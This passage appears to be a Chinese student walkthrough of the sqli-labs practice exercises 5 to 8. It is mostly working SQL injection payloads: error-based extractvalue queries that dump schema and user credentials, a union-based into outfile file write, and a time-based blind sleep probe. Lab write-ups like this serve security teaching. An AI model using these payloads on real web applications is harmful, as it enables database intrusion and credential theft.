?id=1’ and extractvalue(1,concat(0x7e,(select database())))–+
引起报错的是0x7e这里也就是~符号,这里回显会执行后面的select语句同时以报错的方式回显
表名:?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))–+
表列:?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)))–+
结果:?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(username,password) from security.users)))–+
第六题
判断闭合方式为"这里和上一题一样没有回显但是报错有回显同样使用报错注入
表名:?id=1“ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))–+
表列:?id=1” and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)))–+
结果:?id=1“ and extractvalue(1,concat(0x7e,(select group_concat(username,password) from security.users)))–+
第七题
这里提示使用outfile,判断闭合方式为’))
select 1,2,database() into outfile “C:\Users\19871\Desktop\phpStudy_64\WWW\sqli-labs-master\Less-7\test.txt”–+
红色标记的地方为靶机该题的保存位置其他和联合注入语句没有区别
?id=1’)) union select 1,2,group_concat(username,password) from security.users into outfile “文件位置”–+
第八题
使用万用测试闭合方式发现闭合方式为’这里没有明显的回显排除union注入,也无报错注入,这里使用盲注,使用时间盲注测试
?id=1’ and if(ascii(concat(database(),1,1))>0,sleep(5),sleep(10))–+